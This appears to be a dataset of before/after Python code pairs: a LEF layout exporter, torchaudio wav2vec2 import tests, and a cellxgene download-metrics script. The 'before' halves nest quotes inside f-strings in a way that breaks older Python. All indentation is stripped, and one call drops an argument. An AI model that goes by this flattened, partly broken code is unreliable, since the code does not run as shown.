fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
elif (blockM == 1) and obj['layer'] == 'Boundary':
for capL in cap_layers:
fp.write(" LAYER %s ;\n" % capL)
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
else:
pass
fp.write(" END\n")
fp.write("END %s\n" % out_lef)
| import sys
import json
import collections
def gen_lef_data(data, fp, macro_name, cell_pin, bodyswitch):
def s(x):
return "%.4f" % (x/10000.0)
fp.write("MACRO %s\n" % macro_name)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % macro_name)
fp.write(" SIZE %s BY %s ;\n" % (s(data['bbox'][2]), s(data['bbox'][3])))
exclude_layers = {"via0", "via1", "via2", "poly", "LISD", "SDT", "RVT",
"M0", "fin", "polycon", "GCUT", "active", "nselect", "pselect", "nwell"}
# O(npins * nsegments) algorithm. Could be O(npins + nsegments) FIX!
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in data['terminals']:
if 'pin' in obj:
if obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
for obj in data['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write("END %s\n" % macro_name)
def gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch):
gen_lef_data(json.load(json_fp), lef_fp, macro_name, cell_pin, bodyswitch)
def gen_lef_json(json_fn, lef_fn, macro_name, cell_pin, bodyswitch):
with open(json_fn, "rt") as json_fp, open(lef_fn, "wt") as lef_fp:
gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin)
def json_lef(input_json, out_lef, cell_pin, bodyswitch, blockM, p):
exclude_layers = p.get_lef_exclude()
macro_name = out_lef + '.lef'
def s(x):
return "%.4f" % (x/10000.0)
# Start: This part converting all negative coordinates into positive
with open(input_json, "rt") as fp:
j = json.load(fp, object_pairs_hook=collections.OrderedDict)
for i in range(4):
j['bbox'][i] *= 10
assert (j['bbox'][3]-j['bbox'][1]
) % p['M2']['Pitch'] == 0, f"Cell height not a multiple of the grid {j['bbox']}"
assert (j['bbox'][2]-j['bbox'][0]
) % p['M1']['Pitch'] == 0, f"Cell width not a multiple of the grid {j['bbox']}"
for obj in j['terminals']:
for i in range(4):
obj['rect'][i] *= 10
with open(input_json, "wt") as fp:
fp.write(json.dumps(j, indent=2) + '\n')
# End:
with open(input_json, "rt") as fp:
j = json.load(fp)
with open(input_json.parents[0] / macro_name, "wt") as fp:
fp.write("MACRO %s\n" % out_lef)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % out_lef)
fp.write(" SIZE %s BY %s ;\n" % (s(j['bbox'][2]), s(j['bbox'][3])))
cell_pin = list(cell_pin)
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in j['terminals']:
if 'pin' in obj and obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
# Check Pins are on grid or not
if obj['layer'] == 'M2':
cy = (obj['rect'][1]+obj['rect'][3])//2
assert cy % p['M2']['Pitch'] == 0, (
f"M2 pin is not on grid {cy} {cy%84}")
if obj['layer'] == 'M1' or obj['layer'] == 'M3':
cx = (obj['rect'][0]+obj['rect'][2])//2
assert cx % p['M1']['Pitch'] == 0, (
f"M1 pin is not on grid {cx} {cx%80}")
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
cap_layers = ['M1', 'M2', 'M3']
for obj in j['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and blockM == 0 and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
elif (blockM == 1) and obj['layer'] == 'Boundary':
for capL in cap_layers:
fp.write(" LAYER %s ;\n" % capL)
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
else:
pass
fp.write(" END\n")
fp.write("END %s\n" % out_lef)
|
import json
import torch
from parameterized import parameterized
from torchaudio.models.wav2vec2 import (
wav2vec2_base,
wav2vec2_large,
wav2vec2_large_lv60k,
)
from torchaudio.models.wav2vec2.utils import import_huggingface_model
from torchaudio_unittest.common_utils import (
get_asset_path,
skipIfNoModule,
TorchaudioTestCase,
)
def _load_config(*paths):
with open(f'{get_asset_path('wav2vec2', 'huggingface', *paths)}.json', "r") as file_:
return json.load(file_)
def _name_func(testcase_func, i, param):
return f"{testcase_func.__name__}_{i}_{param[0][1].__name__}"
# Pretrained
HF_BASE = _load_config("wav2vec2-base")
HF_LARGE = _load_config("wav2vec2-large")
HF_LARGE_LV60 = _load_config("wav2vec2-large-lv60")
HF_LARGE_XLSR_53 = _load_config("wav2vec2-large-xlsr-53")
HF_BASE_10K_VOXPOPULI = _load_config("wav2vec2-base-10k-voxpopuli")
# Finetuned
HF_BASE_960H = _load_config("wav2vec2-base-960h")
HF_LARGE_960H = _load_config("wav2vec2-large-960h")
HF_LARGE_LV60_960H = _load_config("wav2vec2-large-960h-lv60")
HF_LARGE_LV60_SELF_960H = _load_config("wav2vec2-large-960h-lv60-self")
HF_LARGE_XLSR_DE = _load_config("wav2vec2-large-xlsr-53-german")
# Config and corresponding factory functions
PRETRAIN_CONFIGS = parameterized.expand(
[
(HF_BASE, wav2vec2_base),
(HF_LARGE, wav2vec2_large),
(HF_LARGE_LV60, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_53, wav2vec2_large_lv60k),
(HF_BASE_10K_VOXPOPULI, wav2vec2_base),
],
name_func=_name_func,
)
FINETUNE_CONFIGS = parameterized.expand(
[
(HF_BASE_960H, wav2vec2_base),
(HF_LARGE_960H, wav2vec2_large),
(HF_LARGE_LV60_960H, wav2vec2_large_lv60k),
(HF_LARGE_LV60_SELF_960H, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_DE, wav2vec2_large_lv60k),
],
name_func=_name_func,
)
@skipIfNoModule("transformers")
class TestHFIntegration(TorchaudioTestCase):
"""Test the process of importing the models from Hugging Face Transformers
Test methods in this test suite check the following things
1. Models loaded with Hugging Face Transformers cane be imported.
2. The same model can be recreated without Hugging Face Transformers.
"""
def _get_model(self, config):
# Helper function to avoid importing transformers on module scope.
# Normally, we use `is_module_available` helper function to check if
# the library is available, and import it on module scope if available.
# However, somehow, once "transformers" is imported, `is_module_available`
# starts to fail. Therefore, we defer importing "transformers" until
# the actual tests are started.
from transformers.models.wav2vec2 import (
Wav2Vec2Config,
Wav2Vec2Model,
Wav2Vec2ForCTC,
)
if config["architectures"] == ["Wav2Vec2Model"]:
return Wav2Vec2Model(Wav2Vec2Config(**config))
if config["architectures"] == ["Wav2Vec2ForCTC"]:
return Wav2Vec2ForCTC(Wav2Vec2Config(**config))
raise ValueError(f'Unexpected arch: {config['architectures']}')
def _test_import_pretrain(self, original, imported, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref = original.feature_extractor(x).transpose(1, 2)
hyp, _ = imported.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = original.feature_projection(x)[0]
hyp = imported.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = original.encoder.pos_conv_embed(x)
hyp = imported.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for original_, imported_ in zip(original.encoder.layers, imported.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
(ref,) = original_(x, attention_mask=mask, output_attentions=False)
hyp = imported_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
ref = original.encoder(x).last_hidden_state
hyp = imported.encoder.transformer(x)
self.assertEqual(ref, hyp)
def _test_import_finetune(self, original, imported, config):
# Aux
x = torch.randn(3, 10, config["hidden_size"])
ref = original.lm_head(x)
hyp = imported.aux(x)
self.assertEqual(ref, hyp)
# The whole model without mask
x = torch.randn(3, 1024)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model without mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model with mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
lengths = torch.randint(
low=0,
high=num_frames,
size=[
batch_size,
],
)
mask = torch.arange(num_frames).expand(batch_size, num_frames) < lengths[:, None]
ref = original(x, attention_mask=mask).logits
hyp, output_lengths = imported(x, lengths)
for i, l in enumerate(output_lengths):
self.assertEqual(ref[i, :l, ...], hyp[i, :l, ...])
@PRETRAIN_CONFIGS
def test_import_pretrain(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original, imported, config)
@FINETUNE_CONFIGS
def test_import_finetune(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original.wav2vec2, imported, config)
self._test_import_finetune(original, imported, config)
def _test_recreate(self, imported, reloaded, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref, _ = imported.feature_extractor(x, None)
hyp, _ = reloaded.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = imported.encoder.feature_projection(x)
hyp = reloaded.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = imported.encoder.transformer.pos_conv_embed(x)
hyp = reloaded.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for imported_, reloaded_ in zip(imported.encoder.transformer.layers, reloaded.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported_(x, mask)
hyp = reloaded_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
# TODO: Add mask pattern. Expected mask shapes and values are different.
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported.encoder.transformer(x)
hyp = reloaded.encoder.transformer(x)
self.assertEqual(ref, hyp)
# Aux
if imported.aux is not None:
x = torch.randn(3, 10, config["hidden_size"])
ref = imported.aux(x)
hyp = reloaded.aux(x)
self.assertEqual(ref, hyp)
# The whole model
x = torch.randn(3, 1024)
ref, _ = imported(x)
hyp, _ = reloaded(x)
self.assertEqual(ref, hyp)
@PRETRAIN_CONFIGS
def test_recreate_pretrain(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func()
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
@FINETUNE_CONFIGS
def test_recreate_finetune(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func(aux_num_out=imported.aux.out_features)
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
| import json
import torch
from parameterized import parameterized
from torchaudio.models.wav2vec2 import (
wav2vec2_base,
wav2vec2_large,
wav2vec2_large_lv60k,
)
from torchaudio.models.wav2vec2.utils import import_huggingface_model
from torchaudio_unittest.common_utils import (
get_asset_path,
skipIfNoModule,
TorchaudioTestCase,
)
def _load_config(*paths):
with open(f'{get_asset_path("wav2vec2", "huggingface", *paths)}.json', "r") as file_:
return json.load(file_)
def _name_func(testcase_func, i, param):
return f"{testcase_func.__name__}_{i}_{param[0][1].__name__}"
# Pretrained
HF_BASE = _load_config("wav2vec2-base")
HF_LARGE = _load_config("wav2vec2-large")
HF_LARGE_LV60 = _load_config("wav2vec2-large-lv60")
HF_LARGE_XLSR_53 = _load_config("wav2vec2-large-xlsr-53")
HF_BASE_10K_VOXPOPULI = _load_config("wav2vec2-base-10k-voxpopuli")
# Finetuned
HF_BASE_960H = _load_config("wav2vec2-base-960h")
HF_LARGE_960H = _load_config("wav2vec2-large-960h")
HF_LARGE_LV60_960H = _load_config("wav2vec2-large-960h-lv60")
HF_LARGE_LV60_SELF_960H = _load_config("wav2vec2-large-960h-lv60-self")
HF_LARGE_XLSR_DE = _load_config("wav2vec2-large-xlsr-53-german")
# Config and corresponding factory functions
PRETRAIN_CONFIGS = parameterized.expand(
[
(HF_BASE, wav2vec2_base),
(HF_LARGE, wav2vec2_large),
(HF_LARGE_LV60, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_53, wav2vec2_large_lv60k),
(HF_BASE_10K_VOXPOPULI, wav2vec2_base),
],
name_func=_name_func,
)
FINETUNE_CONFIGS = parameterized.expand(
[
(HF_BASE_960H, wav2vec2_base),
(HF_LARGE_960H, wav2vec2_large),
(HF_LARGE_LV60_960H, wav2vec2_large_lv60k),
(HF_LARGE_LV60_SELF_960H, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_DE, wav2vec2_large_lv60k),
],
name_func=_name_func,
)
@skipIfNoModule("transformers")
class TestHFIntegration(TorchaudioTestCase):
"""Test the process of importing the models from Hugging Face Transformers
Test methods in this test suite check the following things
1. Models loaded with Hugging Face Transformers cane be imported.
2. The same model can be recreated without Hugging Face Transformers.
"""
def _get_model(self, config):
# Helper function to avoid importing transformers on module scope.
# Normally, we use `is_module_available` helper function to check if
# the library is available, and import it on module scope if available.
# However, somehow, once "transformers" is imported, `is_module_available`
# starts to fail. Therefore, we defer importing "transformers" until
# the actual tests are started.
from transformers.models.wav2vec2 import (
Wav2Vec2Config,
Wav2Vec2Model,
Wav2Vec2ForCTC,
)
if config["architectures"] == ["Wav2Vec2Model"]:
return Wav2Vec2Model(Wav2Vec2Config(**config))
if config["architectures"] == ["Wav2Vec2ForCTC"]:
return Wav2Vec2ForCTC(Wav2Vec2Config(**config))
raise ValueError(f'Unexpected arch: {config["architectures"]}')
def _test_import_pretrain(self, original, imported, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref = original.feature_extractor(x).transpose(1, 2)
hyp, _ = imported.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = original.feature_projection(x)[0]
hyp = imported.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = original.encoder.pos_conv_embed(x)
hyp = imported.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for original_, imported_ in zip(original.encoder.layers, imported.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
(ref,) = original_(x, attention_mask=mask, output_attentions=False)
hyp = imported_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
ref = original.encoder(x).last_hidden_state
hyp = imported.encoder.transformer(x)
self.assertEqual(ref, hyp)
def _test_import_finetune(self, original, imported, config):
# Aux
x = torch.randn(3, 10, config["hidden_size"])
ref = original.lm_head(x)
hyp = imported.aux(x)
self.assertEqual(ref, hyp)
# The whole model without mask
x = torch.randn(3, 1024)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model without mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model with mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
lengths = torch.randint(
low=0,
high=num_frames,
size=[
batch_size,
],
)
mask = torch.arange(num_frames).expand(batch_size, num_frames) < lengths[:, None]
ref = original(x, attention_mask=mask).logits
hyp, output_lengths = imported(x, lengths)
for i, l in enumerate(output_lengths):
self.assertEqual(ref[i, :l, ...], hyp[i, :l, ...])
@PRETRAIN_CONFIGS
def test_import_pretrain(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original, imported, config)
@FINETUNE_CONFIGS
def test_import_finetune(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original.wav2vec2, imported, config)
self._test_import_finetune(original, imported, config)
def _test_recreate(self, imported, reloaded, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref, _ = imported.feature_extractor(x, None)
hyp, _ = reloaded.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = imported.encoder.feature_projection(x)
hyp = reloaded.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = imported.encoder.transformer.pos_conv_embed(x)
hyp = reloaded.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for imported_, reloaded_ in zip(imported.encoder.transformer.layers, reloaded.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported_(x, mask)
hyp = reloaded_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
# TODO: Add mask pattern. Expected mask shapes and values are different.
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported.encoder.transformer(x)
hyp = reloaded.encoder.transformer(x)
self.assertEqual(ref, hyp)
# Aux
if imported.aux is not None:
x = torch.randn(3, 10, config["hidden_size"])
ref = imported.aux(x)
hyp = reloaded.aux(x)
self.assertEqual(ref, hyp)
# The whole model
x = torch.randn(3, 1024)
ref, _ = imported(x)
hyp, _ = reloaded(x)
self.assertEqual(ref, hyp)
@PRETRAIN_CONFIGS
def test_recreate_pretrain(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func()
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
@FINETUNE_CONFIGS
def test_recreate_finetune(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func(aux_num_out=imported.aux.out_features)
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
|
import boto3
from uuid import uuid4
from collections import defaultdict
import time
from pandas import DataFrame
import datetime
import numpy as np
import pandas
import requests
pandas.set_option(
"display.max_rows", None, "display.max_columns", None, "display.width", 1000, "display.max_colwidth", None
)
def get_json_response(collection_id):
collection_info_response = requests.get(f"https://api.cellxgene.cziscience.com/dp/v1/collections/{collection_id}")
collection_info = collection_info_response.json()
return collection_info
def construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis():
# Fetch list of collection ids
collections_response = requests.get("https://api.cellxgene.cziscience.com/dp/v1/collections")
collections = collections_response.json()["collections"]
collection_ids = [collection.get("id") for collection in collections]
all_collection_responses = {}
for collection_id in collection_ids:
all_collection_responses[collection_id] = get_json_response(collection_id)
dataset_name_by_s3_uri = {}
collection_id_by_s3_uri = {}
for collection_id, collection_information in all_collection_responses.items():
datasets_in_collection = collection_information.get("datasets")
for dataset in datasets_in_collection:
dataset_id = dataset.get("id")
dataset_name = dataset.get("name")
dataset_assets = dataset.get("dataset_assets")
for dataset_asset in dataset_assets:
uri = dataset_asset.get("s3_uri")
uri = uri.replace("s3://corpora-data-prod/", "")
if uri in dataset_name_by_s3_uri:
print(f"ERROR: Why is this URI repeated in dataset name dict? {uri}")
else:
dataset_name_by_s3_uri[uri] = dataset_name
if uri in collection_id_by_s3_uri:
print(f"ERROR: Why is this URI repeated in collection id dict? {uri}")
else:
collection_id_by_s3_uri[uri] = collection_id
return dataset_name_by_s3_uri, collection_id_by_s3_uri
def create_query(client, query_id, today_datestring=None):
if today_datestring is None:
today = datetime.date.today().strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (datetime.datetime.now() - datetime.timedelta(days=7)).date().strftime("%Y-%m-%d:%H:%M:%S")
else:
today_datetime = datetime.date.fromisoformat(today_datestring)
today = today_datetime.strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (
(datetime.datetime.fromisoformat(today_datestring) - datetime.timedelta(days=7))
.date()
.strftime("%Y-%m-%d:%H:%M:%S")
)
print(f"Starting date is: {one_week_ago}. Ending date is: {today}.")
query_string = (
"SELECT key, requestdatetime, remoteip, operation, bytessent, useragent FROM "
"cellxgene_portal_dataset_download_logs_db.dataset_download_logs WHERE operation like "
"'REST.GET.OBJECT' AND parse_datetime(requestdatetime,'dd/MMM/yyyy:HH:mm:ss Z') BETWEEN "
f"parse_datetime('{one_week_ago}','yyyy-MM-dd:HH:mm:ss') AND parse_datetime('{today}',"
"'yyyy-MM-dd:HH:mm:ss');"
)
response = client.get_database(
CatalogName="AwsDataCatalog", DatabaseName="cellxgene_portal_dataset_download_logs_db"
)
response = client.start_query_execution(
QueryString=query_string,
ClientRequestToken=query_id,
QueryExecutionContext={"Database": "cellxgene_portal_dataset_download_logs_db", "Catalog": "AwsDataCatalog"},
ResultConfiguration={
"OutputLocation": "s3://corpora-data-prod-logs-queries",
},
)
return response.get("QueryExecutionId")
def get_query_results(client, query_id, dataset_name_by_s3_uri, collection_id_by_s3_uri):
# Wait for the query results
results_have_not_been_calculated = True
while results_have_not_been_calculated:
try:
response = client.get_query_execution(QueryExecutionId=query_id)
status = response.get("QueryExecution").get("Status").get("State")
if status == "SUCCEEDED":
results_have_not_been_calculated = False
except:
print(f"Wasn't able to get query information for query ID {query_id} yet. Please be patient!")
time.sleep(1)
response = client.get_query_results(QueryExecutionId=query_id)
rows = response.get("ResultSet").get("Rows")
# Structure that will hold all the metrics
metadata_by_dataset = defaultdict(dict)
total_downloads = 0
ips = set()
# Delete the first row since it just contains the headers
rows = rows[1:]
for row in rows:
row_data = row.get("Data")
total_downloads += 1
# Get dataset id
dataset_id = row_data[0].get("VarCharValue")
# If this dataset is private, skip its download metrics
if (dataset_id not in collection_id_by_s3_uri) and (dataset_id not in dataset_name_by_s3_uri):
continue
# Generate the unique dataset index for this dataset by concatenating the collection ID and the dataset ID
dataset_index = f"{collection_id_by_s3_uri.get(dataset_id, "PRIVATE_COLLECTION")}/{dataset_name_by_s3_uri.get(dataset_id, "PRIVATE_DATASET")}"
# Get existing aggregated metrics, if any.
if dataset_index not in metadata_by_dataset:
metadata_by_dataset[dataset_index] = {
"curl_downloads": 0,
"browser_downloads": 0,
"total_downloads": 0,
"h5ad_downloads": 0,
"seurat_downloads": 0,
}
dataset_metrics = metadata_by_dataset[dataset_index]
for index, metadata in enumerate(row_data):
if index == 0:
dataset_metrics["total_downloads"] += 1
if "h5ad" in metadata.get("VarCharValue"):
dataset_metrics["h5ad_downloads"] += 1
elif "rds" in metadata.get("VarCharValue"):
dataset_metrics["seurat_downloads"] += 1
if index == 2:
ips.add(metadata.get("VarCharValue"))
if index == 5:
type_of_download = metadata.get("VarCharValue")
if "curl" in type_of_download:
dataset_metrics["curl_downloads"] += 1
else:
dataset_metrics["browser_downloads"] += 1
metadata_by_dataset[dataset_index] = dataset_metrics
dataset_metrics_df = DataFrame.from_dict(metadata_by_dataset, orient="index")
dataset_metrics_df.to_csv("results.csv")
print(f"Total number of downloads of all datasets: {total_downloads}")
print(f"Total number of unique IP addresses: {len(ips)}")
if __name__ == "__main__":
client = boto3.client("athena", region_name="us-west-2")
query_id = str(uuid4())
# Construct dataset id -> collection id and dataset id -> dataset name indices
(
dataset_name_by_s3_uri,
collection_id_by_s3_uri,
) = construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis()
# Create query
query_execution_id = create_query(client, query_id)
# Get query results
get_query_results(client, query_execution_id, dataset_name_by_s3_uri, collection_id_by_s3_uri)
| import boto3
from uuid import uuid4
from collections import defaultdict
import time
from pandas import DataFrame
import datetime
import numpy as np
import pandas
import requests
pandas.set_option(
"display.max_rows", None, "display.max_columns", None, "display.width", 1000, "display.max_colwidth", None
)
def get_json_response(collection_id):
collection_info_response = requests.get(f"https://api.cellxgene.cziscience.com/dp/v1/collections/{collection_id}")
collection_info = collection_info_response.json()
return collection_info
def construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis():
# Fetch list of collection ids
collections_response = requests.get("https://api.cellxgene.cziscience.com/dp/v1/collections")
collections = collections_response.json()["collections"]
collection_ids = [collection.get("id") for collection in collections]
all_collection_responses = {}
for collection_id in collection_ids:
all_collection_responses[collection_id] = get_json_response(collection_id)
dataset_name_by_s3_uri = {}
collection_id_by_s3_uri = {}
for collection_id, collection_information in all_collection_responses.items():
datasets_in_collection = collection_information.get("datasets")
for dataset in datasets_in_collection:
dataset_id = dataset.get("id")
dataset_name = dataset.get("name")
dataset_assets = dataset.get("dataset_assets")
for dataset_asset in dataset_assets:
uri = dataset_asset.get("s3_uri")
uri = uri.replace("s3://corpora-data-prod/", "")
if uri in dataset_name_by_s3_uri:
print(f"ERROR: Why is this URI repeated in dataset name dict? {uri}")
else:
dataset_name_by_s3_uri[uri] = dataset_name
if uri in collection_id_by_s3_uri:
print(f"ERROR: Why is this URI repeated in collection id dict? {uri}")
else:
collection_id_by_s3_uri[uri] = collection_id
return dataset_name_by_s3_uri, collection_id_by_s3_uri
def create_query(client, query_id, today_datestring=None):
if today_datestring is None:
today = datetime.date.today().strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (datetime.datetime.now() - datetime.timedelta(days=7)).date().strftime("%Y-%m-%d:%H:%M:%S")
else:
today_datetime = datetime.date.fromisoformat(today_datestring)
today = today_datetime.strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (
(datetime.datetime.fromisoformat(today_datestring) - datetime.timedelta(days=7))
.date()
.strftime("%Y-%m-%d:%H:%M:%S")
)
print(f"Starting date is: {one_week_ago}. Ending date is: {today}.")
query_string = (
"SELECT key, requestdatetime, remoteip, operation, bytessent, useragent FROM "
"cellxgene_portal_dataset_download_logs_db.dataset_download_logs WHERE operation like "
"'REST.GET.OBJECT' AND parse_datetime(requestdatetime,'dd/MMM/yyyy:HH:mm:ss Z') BETWEEN "
f"parse_datetime('{one_week_ago}','yyyy-MM-dd:HH:mm:ss') AND parse_datetime('{today}',"
"'yyyy-MM-dd:HH:mm:ss');"
)
response = client.get_database(
CatalogName="AwsDataCatalog", DatabaseName="cellxgene_portal_dataset_download_logs_db"
)
response = client.start_query_execution(
QueryString=query_string,
ClientRequestToken=query_id,
QueryExecutionContext={"Database": "cellxgene_portal_dataset_download_logs_db", "Catalog": "AwsDataCatalog"},
ResultConfiguration={
"OutputLocation": "s3://corpora-data-prod-logs-queries",
},
)
return response.get("QueryExecutionId")
def get_query_results(client, query_id, dataset_name_by_s3_uri, collection_id_by_s3_uri):
# Wait for the query results
results_have_not_been_calculated = True
while results_have_not_been_calculated:
try:
response = client.get_query_execution(QueryExecutionId=query_id)
status = response.get("QueryExecution").get("Status").get("State")
if status == "SUCCEEDED":
results_have_not_been_calculated = False
except:
print(f"Wasn't able to get query information for query ID {query_id} yet. Please be patient!")
time.sleep(1)
response = client.get_query_results(QueryExecutionId=query_id)
rows = response.get("ResultSet").get("Rows")
# Structure that will hold all the metrics
metadata_by_dataset = defaultdict(dict)
total_downloads = 0
ips = set()
# Delete the first row since it just contains the headers
rows = rows[1:]
for row in rows:
row_data = row.get("Data")
total_downloads += 1
# Get dataset id
dataset_id = row_data[0].get("VarCharValue")
# If this dataset is private, skip its download metrics
if (dataset_id not in collection_id_by_s3_uri) and (dataset_id not in dataset_name_by_s3_uri):
continue
# Generate the unique dataset index for this dataset by concatenating the collection ID and the dataset ID
dataset_index = f"{collection_id_by_s3_uri.get(dataset_id, 'PRIVATE_COLLECTION')}/{dataset_name_by_s3_uri.get(dataset_id, 'PRIVATE_DATASET')}"
# Get existing aggregated metrics, if any.
if dataset_index not in metadata_by_dataset:
metadata_by_dataset[dataset_index] = {
"curl_downloads": 0,
"browser_downloads": 0,
"total_downloads": 0,
"h5ad_downloads": 0,
"seurat_downloads": 0,
}
dataset_metrics = metadata_by_dataset[dataset_index]
for index, metadata in enumerate(row_data):
if index == 0:
